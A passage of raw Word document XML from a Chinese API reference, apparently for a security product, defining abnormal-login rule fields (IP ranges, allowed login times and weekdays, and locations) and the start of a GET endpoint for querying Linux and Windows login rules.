        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06569D5B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43DF4F6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3A024B6B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60D2C5F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>startStr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1100C5AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65AC8C36" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(25)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="278BD1F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>IP段起始</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="721211CF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0514102E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>endStr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DBD730C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17F3985C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(25)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7728C4C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>IP段结束</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2302B265" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A42146E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>start</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14169EE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42DA965A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56C6C865" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>IP段起始</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="65F8809A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39828F27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60BAA96D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7402A7C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24EAFCFF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>IP段结束</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="096A761B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="146" w:name="logintimes数据结构"/>
      <w:bookmarkEnd w:id="145"/>
      <w:r>
        <w:t>loginTimes数据结构</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1390"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="3925"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="497B169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4419B56" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73F10E8D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01C82F0A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77C130D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="11B392EB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="121DE2FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>start</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F99D8BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C1C4916" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="142CB1F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>开始时间，如14：00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="29259B89" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3117FA78" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FF090CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AF0060D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75250B0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>结束时间，如18：20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="67EB5106" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22CC9809" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>startMinutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DF14CC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D1AB738" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14F3CC25" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>开始时间，如840(例：14×60=840)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0B0334FE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49904C1D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>endMinutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FC4D4D1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D253F6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18FF08D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>结束时间，如1100(例：18×60+20=1100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6DED0451" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1514A4AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>weeks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53FE67B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61DE0D1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EA9AA0A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>周期(周一到周日)，如[1,2,3,4,5,6,0]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38CB8A97" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="147" w:name="loginlocations数据结构"/>
      <w:bookmarkEnd w:id="146"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>loginLocations数据结构</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1040"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="36BEEEB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390A3BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EE65E2F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36B7E05B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4726CE23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="069F9C48" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55D84F00" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>country</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="665B8425" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FE974C7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A31E15E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>国家</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="021A9F18" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="343B346C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>province</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E56EAE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="477E6753" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="574EB8F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>省</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4F43D9AB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52561A82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>city</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C43CF4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6074F1A0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01665E7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>市</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7902636A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BACCD32" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则不存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F48E263" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>帐号没有权限，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A21C71C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="148" w:name="查询多条规则"/>
      <w:bookmarkEnd w:id="143"/>
      <w:bookmarkEnd w:id="147"/>
      <w:r>
        <w:t>查询多条规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE03A2A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux/Windows异常登录规则的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5124318D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748DD552" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/detect/abnormallogin/{linux,win}/rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003DA899" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1517"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4551AF8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879A828" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E34F7AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="610E7459" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="029265A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="15C412C8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69C77FF2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="258456B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60FF37E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A101360" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>登录IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="61465891" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E115262" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginLocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19923745" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="195F185A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7035F6B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>登录区域</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62C09235" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
